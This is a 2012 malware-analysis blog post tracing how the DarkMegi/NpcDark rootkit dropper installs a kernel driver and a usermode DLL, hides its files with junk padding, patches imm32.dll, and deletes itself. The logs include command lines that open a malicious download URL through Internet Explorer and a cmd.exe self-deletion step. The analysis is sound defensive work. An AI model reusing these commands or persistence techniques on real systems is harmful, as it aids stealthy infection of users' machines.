# Stop Malvertising **[stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html](http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html)** Analysis of DarkMegi aka NpcDark [Written by Kimberly on Friday, 20 April 2012. Posted in Rootkits Viewed 6867 times](https://stopmalvertising.com/rootkits/) I’ve always been interested in rootkits and their removal. So it was no surprise that after reading the article about DarkMegi I tried to find the rootkit dropper. Two security colleagues were kind enough to forward me a few samples. [According to the analysis performed by McAfee Labs, DarkMegi was the first known threat](http://blogs.mcafee.com/mcafee-labs/darkmegi-not-the-rootkit-youre-looking-for) [delivered through the CVE-2012-0003 - MIDI Remote Code Execution Vulnerability.](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003) [DarkMegi has also been distributed via the Gong Da Pack exploit kit and more recently via](http://www.kahusecurity.com/2012/chinese-pack-using-dadongs-jsxx-vip-script/) the Blackhole Exploit kit. DarkMegi is complex and difficult to analyze; it involves more than just dropping a usermode component ( com32.dll) and a kernel driver (com32.sys) on the victim’s computer. Upon execution DarkMegiSample.exe, as we will name the file in the analysis, starts up an instance of ipconfig.exe. [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1160] [EXECUTION] Commandline - [ ipconfig.exe ] DarkMegiSample.exe then installs a service called Com32 and drops the kernel driver com32.sys into the Drivers directory. At this stage, 9728 bytes have been written to the file. [DRIVER/SERVICE] c:\documents and settings\kly\desktop\darkmegisample.exe [1160] Tried to install a driver/service named Com32 ----- DarkMegiSample.exe then creates a file called RCX1.tmp in the Drivers folder, copies the current content of com32.sys to the file and appends a huge pile of junk data to RCX1.tmp so that the size of the file is 25.0 MB (26,224,256 bytes). The file com32.sys is deleted and RCX1.tmp is renamed as com32.sys. The kernel driver com32.sys contains a couple of interesting strings: 0x00001757: 'H:\RKTDOW~1\RKTDRI~1\RKTDRI~1\objfre\i386\RktDriver.pdb' 0x019021C4: 'The driver for the supercool driver-based tool' 0x01902328: 'Supercool driver-based tool' 0x0000062E: 'DosDevices\NpcDark' 0x0000060E: 'Device\NpcDark' 0x01902274: 'RktDriver.sys' DarkMegiSample.exe then drops the usermode component com32.dll, the file size is 45,056 bytes upon creation. Similar to the driver, the dll will get a huge amount of junk data appended so that the final file size becomes 30.0 MB (31,506,432 bytes). The file com32.dll is deleted and RCX2.tmp is renamed as com32.dll. ----- DarkMegiSample.exe launches an instance of rundll32.exe to load the freshly created usermode component com32.dll. [EXECUTION] "c:\windows\system32\rundll32.exe" was blocked from running [EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1160] [EXECUTION] Commandline - [ c:\windows\system32\rundll32.exe c:\windows\system32\com32.dll getinterface ] DarkMegiSample.exe launches several hidden instances of Internet Explorer. The usermode component com32.dll is loaded under Internet Explorer too now. [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1160] [EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" ] [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1844] [EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" ] The usermode component com32.dll contains a list of hardcoded DNS Servers and is most likely able to download an updated version of the rootkit. Again we find a reference to NpcDark ... would the author be a fan of WOW (World of Warcraft)? ----- 8.8.8.8 - google-public-dns-a.google.com 208.67.222.222 - resolver1.opendns.com 165.87.201.244 - ns4.us.prserv.net 209.166.160.36 - orion.dns.cc.stargate.net 168.95.192.1 - hntp1.hinet.net Internet access is requested to download two files and contact what seems to be a stats page. 20111230.exe is renamed as fuc6.tmp.exe 20111230.jpg is renamed as fuc5.tmp ----- [EXECUTION] c:\program files\internet explorer\iexplore.exe was allowed to run [EXECUTION] Started by "c:\windows\system32\rundll32.exe" [1968] [EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" http://images.hananren.com/newd.htm ] The domain images.hananren.com has been registered the 1st of July 2011 and as seen below the registrant details are totaly faked. images.hananren.com - 70.39.69.236 **Updated** **Date:** **Creation** **Date:** **Name** **Server:** **Name** **Server:** 01-jul-2011 01-jul-2011 NS77.DOMAINCONTROL.COM NS78.DOMAINCONTROL.COM **Registrar:** GODADDY.COM, LLC ----- **Registrant:** y3z1007 y3z1007 This e-mail address is being protected from spambots. You need JavaScript enabled to view it sdfsfsdfsdfsdf benjing, beijing 101100 China 1-380-013-8000 DarkMegiSample.exe will now exit and delete itself. The file fuc6.tmp.exe is launched by rundll32.exe and will also delete itself after execution. [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run [EXECUTION] Started by "Unknown Process" [2212] [EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c del "c:\docume~1\kly\locals~1\temp\fuc6.tmp.exe" ] It's hard to tell what the purpose of fuc6.tmp.exe is via Process Monitor but we notice that a randomly named file, VT2XT4d.tmp in our analysis, has been marked for deletion upon reboot. Both cmd.exe and Internet Explorer will load another dll dropped by the rootkit: bdcapEx32.dll. After examining the strings in VT2XT4d.tmp I found out that this was actually a copy of imm32.dll. The file imm32.dll had been patched to load ... bdcapEx32.dll. ----- The file imm32.dll is loaded by a huge number of processes on the system. -----